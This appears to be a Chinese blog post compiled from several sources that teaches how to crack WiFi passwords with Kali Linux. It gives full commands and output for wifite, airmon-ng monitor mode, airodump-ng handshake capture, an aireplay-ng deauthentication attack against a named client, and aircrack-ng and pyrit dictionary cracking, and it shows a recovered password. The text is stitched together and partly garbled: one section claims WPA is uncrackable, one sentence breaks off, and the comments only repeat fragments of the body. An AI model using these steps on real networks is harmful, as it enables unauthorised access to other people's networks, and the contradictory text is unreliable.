作者:hacker 日期:2022-07-17 分类:网络安全
首先kali渗透wifi工具,虚拟机内是无法使用内置无线网卡的,如果在虚拟机上用kali破解wifi,是需要usb无线网卡的。
在kali里面破解无线网kali渗透wifi工具:在终端输入命令wifite,它会打开网卡的监听模式并扫描附近的无线网显示出来,显示一会儿后按下键盘上的ctrl+c组合键,它会让你选择破解的目标网络,这时输入序号(数字),它就会自动进行破解工作,破解完成有提示。
原理:wifite命令是无线渗透测试的自动化脚本,它实际上是个python脚本,用于自动化调用kali上面的各种工具,像是reaver、aircrack-ng等。它先尝试pin码破解,无法用pin码破解时,会尝试抓取握手包,用字典进行握手包的暴力破解。pin码破解的时间比较短,握手包的暴力破解可能会用gpu加速,取决于主机的性能和密码的复杂程度,虚拟机对握手包暴力破解很无力(性能局限),就指望pin码破解了。
kali Linux下破解wifi非常简单,全程只能用下一步来描述。 工具路径 /usr/share/fern-wifi-cracker python execute.py 即可运行图形化工具 选择无线网卡wlan0 然后点击下面的激活。 打开发现的wifi热点设备 先加载字典,勾上Automate 然后单击你
1、以现有的技术手段,是没有办法破解WPA的加密方式(现在基本上全部WIFI的加密方式),WPA的加密方式安全性很高,根本就破不了。
2、即使破解密码,人家也有可能设置了MAC地址过滤,还是上不去。
3、网上的所谓破解密码软件,全部都是骗人的,要么浪费你的流量,要么根本就是木马,要小心下载使用。
4、可以下个WIFI万能钥匙,但那个软件只是能上别人分享过的热点,如果热点没被分享过,根本就上不了。
5、也可破解些简单的数字密码。比如12345678之类的密码。
我找到一套完整讲解kali系统下工具破击wifi的视频。你懂得我就放附件了。
首先在台式机上一定要有一个无线网卡,可以是插在主板上的无线网卡,也可以是USB接口的外置无线网卡,但是最好是Kali Linux支持的型号,不然驱动程序的问题很麻烦,X宝上有的卖。
再说Kali,Kali Linux上破解WIFI的工具非常全面,因为Kali有无线渗透测试的功能,但是系统性的学习还是挺麻烦的,一条条的调用命令破解步骤也比较繁琐,非专业渗透测试人员推荐用一个Kali上面用于无线渗透测试的傻瓜型自动化脚本,那就是wifite。
wifite命令是用于无线渗透测试的自动化测试脚本,它是个python脚本,用于自动化调用kali上面的各种无线测试工具,像是reaver、aircrack-ng等。它会先尝试PIN码破解wifi,当无法用PIN码破解时,会尝试抓取wifi验证握手包,然后用Kali上的字典进行握手包的暴力破解。PIN码破解的时间一般比较短,握手包的暴力破解会用GPU来加速,破解的速度取决于主机的性能配置(还有密码的复杂程度)。
wifite的使用方法:直接在终端输入命令wifite,它会调用aircrack-ng打开网卡的监听模式并扫描附近的无线网络并一一显示出来,等它显示一会儿后按下键盘上的Ctrl+C组合键,它会中断对无线网的扫描并让你选择破解的目标网络,这时输入要破解的网络的序号(注意是序号,是个数字)并按下回车,它就会自动进行破解工作,破解过程可能很长,也可能会失败,等到破解完成会有相应的提示。
首先需要有一台运行kali linux的机器,无论是虚拟机或物理机,一块支持监听模式的无线网卡
root@kali:~# iwconfig wlan1 IEEE 802.11bg ESSID:off/any Mode:Managed Access Point: Not-Associated Tx-Power=20 dBm Retry short limit:7 RTS thr:off Fragment thr:off Encryption key:off Power Management:off eth0 no wireless extensions.lo no wireless extensions.
查看无线网卡设备名
root@kali:~# airmon-ng start wlan1Found 2 processes that could cause trouble.If airodump-ng, aireplay-ng or airtun-ng stops working aftera short period of time, you may want to kill (some of) them!-e PID Name2772 dhclient4415 wpa_supplicantInterface Chipset Driverwlan1 Realtek RTL8187L rtl8187 - [phy0] (monitor mode enabled on mon0)
进入监听模式
airodump-ng mon0 会列出搜索到的所有无线网络
从中找到你要测试破解的,copy下来BSSID
root@kali:~/test# airodump-ng -w nenew -c 11 --bssid E4:D3:32:41:56:12 mon0 CH 11 ][ Elapsed: 1 min ][ 2014-09-12 23:31 ][ WPA handshake: E4:D3:32:41:56:12 BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID E4:D3:32:41:56:12 -44 53 171 7 0 11 54e. WPA2 CCMP PSK TP-LINK_5612 BSSID STATION PWR Rate Lost Frames Probe E4:D3:32:41:56:12 00:00:00:00:00:00 0 0 - 1 0 18135 E4:D3:32:41:56:12 64:B4:73:40:60:5C -21 1e- 6e 0 7
当看到WPA handshake:说明抓到了握手包,就可以来破解了
如果一直抓不到,可以用如下命令来攻击,强迫重新握手
aireplay-ng -0 10 -a E4:D3:32:41:56:12 -c 64:B4:73:40:60:5C mon0 --ignore-negative-one
抓到握手包后,就可以用字典来跑密码了。
root@kali:~/test# aircrack-ng -w ./password.txt nenew-21.cap Opening nenew-21.capRead 18654 packets. # BSSID ESSID Encryption 1 D0:C7:C0:6E:53:53 TP-LINK_5353 WPA (1 handshake)Choosing first network as target.Opening nenew-21.capReading packets, please wait...
跑的速度如何取决于你机器的性能,更取决于你的字典
如果用物理机,有比较好的显卡,还可以用显卡来加速破解,效率比cpu高的多
kali linux下装显卡驱动,sdk等,参考如下链接
我这里用显卡,很快就跑出了密码
root@kali:~# pyrit -r nenew-21.cap -i password.txt -b D0:C7:C0:6E:53:53 attack_passthroughPyrit 0.4.1-dev (svn r308) (C) 2008-2011 Lukas Lueg code is distributed under the GNU General Public License v3+Parsing file 'nenew-21.cap' (1/1)...Parsed 14 packets (14 802.11-packets), got 1 AP(s)Tried 4420221 PMKs so far; 86496 PMKs per second.The password is 'qq123789'.
已有3位网友发表了看法:
访客 评论于 [2022-07-17 14:39:33] 回复
extensions.lo no wireless extensions.查看无线网卡设备名root@kali:~# airmon-ng start wlan1Found 2 processes that could cause trouble.If a
访客 评论于 [2022-07-17 14:10:54] 回复
典进行握手包的暴力破解。PIN码破解的时间一般比较短,握手包的暴力破解会用GPU来加速,破解的速度取决于主机的性能配置(还有密码的复杂程度)。wifite的使用方法:直接在终端输入命令wifite,它会调用aircrack-ng打开网卡的监听模式并扫描附
访客 评论于 [2022-07-17 15:33:46] 回复
E4:D3:32:41:56:12 00